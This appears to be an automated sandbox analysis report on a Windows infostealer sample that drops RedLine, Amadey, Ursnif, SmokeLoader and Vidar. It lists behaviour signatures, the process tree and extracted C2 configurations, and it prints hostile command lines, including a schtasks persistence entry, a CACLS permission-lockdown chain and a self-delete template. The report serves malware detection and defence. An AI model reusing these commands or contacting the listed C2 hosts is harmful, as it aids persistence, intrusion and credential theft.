Edit tour

Windows Analysis Report
S2XJ2wbz7u.exe

Overview

General Information

Sample Name:	S2XJ2wbz7u.exe
Analysis ID:	749806
MD5:	ffb4cf34b38f126c917e1c1e1d26df73
SHA1:	36e558fdb10418aa971aea3f02d6ba1f4d566ed2
SHA256:	4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
Tags:	exeRedLineStealer
Infos:

Detection

Ursnif, Amadey, RedLine, SmokeLoader, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Allocates memory in foreign processes

May check the online IP address of the machine

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Opens the same file many times (likely Sandbox evasion)

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Connects to a URL shortener service

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Uses cacls to modify the permissions of files

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

S2XJ2wbz7u.exe (PID: 6020 cmdline: C:\Users\user\Desktop\S2XJ2wbz7u.exe MD5: FFB4CF34B38F126C917E1C1E1D26DF73)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

2B4A.exe (PID: 5260 cmdline: C:\Users\user\AppData\Local\Temp\2B4A.exe MD5: 2DEE200193091BE2F2321D921750C4ED)

3790.exe (PID: 2336 cmdline: C:\Users\user\AppData\Local\Temp\3790.exe MD5: 5E08968D858224A33175069D64DC7F39)

rovwer.exe (PID: 4764 cmdline: "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" MD5: 5E08968D858224A33175069D64DC7F39)

schtasks.exe (PID: 1396 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5972 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 4392 cmdline: CACLS "rovwer.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 4984 cmdline: CACLS "rovwer.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5668 cmdline: CACLS "..\99e342142d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 3124 cmdline: CACLS "..\99e342142d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

453D.exe (PID: 4024 cmdline: C:\Users\user\AppData\Local\Temp\453D.exe MD5: F96144B1D5B53D93CAADDDADE38DB5E9)

59FE.exe (PID: 5228 cmdline: C:\Users\user\AppData\Local\Temp\59FE.exe MD5: 44A7E13ECC55CE9797C5121B230D9927)

6644.exe (PID: 1916 cmdline: C:\Users\user\AppData\Local\Temp\6644.exe MD5: 19A79DADDFAAC09499E79ADE27E756F8)

6CEC.exe (PID: 4968 cmdline: C:\Users\user\AppData\Local\Temp\6CEC.exe MD5: 28A6112DCB54CE6886F7D9ACB8A15E31)

conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 5496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

816F.exe (PID: 1172 cmdline: C:\Users\user\AppData\Local\Temp\816F.exe MD5: 730A7A6F235525238EE33A2C046C2BA7)

86EE.exe (PID: 4972 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

86EE.exe (PID: 5560 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

86EE.exe (PID: 5068 cmdline: C:\Users\user\AppData\Local\Temp\86EE.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

8C00.exe (PID: 5400 cmdline: C:\Users\user\AppData\Local\Temp\8C00.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

8C00.exe (PID: 5936 cmdline: C:\Users\user\AppData\Local\Temp\8C00.exe MD5: F46063253FF38E6B2452BF4410C5FEC0)

explorer.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 5928 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 1768 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

explorer.exe (PID: 5080 cmdline: C:\Windows\explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 3780 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

tiddsjj (PID: 3152 cmdline: C:\Users\user\AppData\Roaming\tiddsjj MD5: FFB4CF34B38F126C917E1C1E1D26DF73)

rovwer.exe (PID: 2560 cmdline: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe MD5: 5E08968D858224A33175069D64DC7F39)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "185.106.92.111:2510", "Bot Id": "New2022", "Authorization Header": "ef6fe7baf59e3191ff2f569e3bf0e2c7"}

Threatname: Ursnif

{"RSA Public Key": "9YTR8AStfTOVxekPy7nye/rJL/CYnuMKiTBMit/N9dFJomCZQw3gdJ20hYjZiaY5PCNTRgc/z2gXfPlfCRRq0/mF+oSBOgliUoJHNN6O1Nl/zAv1hC+MVoITbvAJoj6LnOzFs9h/l3E4DMphz+dHiiDgppDXx4StPfi30EoQByvOIhjndZV3g8kYMJyGj8dxlmi3X9wSz6RHT9/HWCOS/i2phbREwr7oohHwh6mObxVhJVx0tZ18f2U+SsDunGdf1nLcyWHfM0cx6e8zBNRaXlZ1HhTEFzQdz5EF2h+r74n2bFODhb+ozhtKQ1CBEf0hf+5D8mLZuH2C+VOO+s90bjJxpTvGseErYwzAwE2lC4o=", "c2_domain": ["lentaphoto.at", "iujdhsndjfks.ru", "gameindikdowd.ru", "jhgfdlkjhaoiu.su"], "botnet": "20", "server": "50", "serpent_key": "izoHlMTDxrB6IFB3", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Threatname: SmokeLoader

{"C2 list": ["http://o3l3roozuidudu.com/", "http://o3npxslymcyfi2.com/", "http://o3b1wk8sfk74tf.com/"]}

Threatname: Vidar

{"C2 url": ["https://t.me/deadftx", "https://www.tiktok.com/@user6068972597711"], "Botnet": "1148", "Version": "55.7"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	INDICATOR_TOOL_PWS_Amady	Detects password stealer DLL. Dropped by Amadey	ditekSHen	0xd86c:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x15608:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x16078:$s1: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData 0x1515c:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0x151c0:$s2: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook 0xdd10:$s3: \Mikrotik\Winbox\Addresses.cdb 0x190dc:$s4: \HostName 0x19104:$s5: \Password 0x17c08:$s6: SOFTWARE\RealVNC\ 0x17c34:$s6: SOFTWARE\RealVNC\ 0x17c60:$s6: SOFTWARE\RealVNC\ 0x17ca8:$s6: SOFTWARE\RealVNC\ 0x17cd4:$s6: SOFTWARE\RealVNC\ 0x1800c:$s7: SOFTWARE\TightVNC\ 0x18038:$s7: SOFTWARE\TightVNC\ 0x18064:$s7: SOFTWARE\TightVNC\ 0x180b0:$s7: SOFTWARE\TightVNC\ 0x1c43c:$s8: cred.dll

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000023.00000000.445464817.0000000003270000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7aa8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000013.00000002.535069692.0000000000B01000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6f64:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000013.00000002.525358193.0000000000930000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002A.00000000.451638661.00000000005A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.419975883.0000000000A61000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000F.00000002.538954387.0000000000A91000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x10a0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c88:$a9: Software\AppDataLow\Software\Microsoft\
0000002E.00000000.457780298.00000000032C0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x34:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0000000F.00000002.529416121.0000000000980000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000C.00000002.540373176.00000000007D6000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1728:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7b4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7b20:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: 2B4A.exe PID: 5260	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 2B4A.exe PID: 5260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rovwer.exe PID: 4764	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
Process Memory Space: rovwer.exe PID: 4764	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: 6644.exe PID: 1916	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
